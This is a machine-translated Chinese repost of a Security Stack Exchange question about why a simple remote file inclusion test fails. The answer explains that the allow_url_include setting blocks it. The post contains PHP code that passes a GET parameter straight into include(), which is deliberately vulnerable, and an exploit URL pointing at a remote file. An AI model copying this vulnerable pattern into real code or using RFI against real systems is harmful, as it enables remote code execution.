简单的远程文件包含漏洞不能工作?
简单的远程文件包含漏洞不能工作?
提问于 2017-04-26 18:15:49
因此,我托管了一个易受RFI攻击的php文件,代码如下:
<?php
echo include($_GET['page']);
?>但是,当我试图通过保存http://192.168.8.133/test.php?page=http://download850.mediafireuserdownload.com/w7tl7lq5agug/iwmmm0do3h6txy1/test.php来利用代码时,就不会执行php代码。我是不是漏掉了什么?或者apache2是否有防止从外部域获取资源的配置?如果我工作得很好的话。但是RFI不应该和这样的简单代码一起工作吗?
我试图包含的文件有以下代码:
<?php
echo 1;
?>回答 1
Security用户
发布于 2017-04-26 18:30:50
我意识到,我的php.ini文件中的设置有"allow_url_include=0“,即使没有针对php代码的过滤器,也不会包含远程urls。
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://security.stackexchange.com/questions/158203
复制相关文章
相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号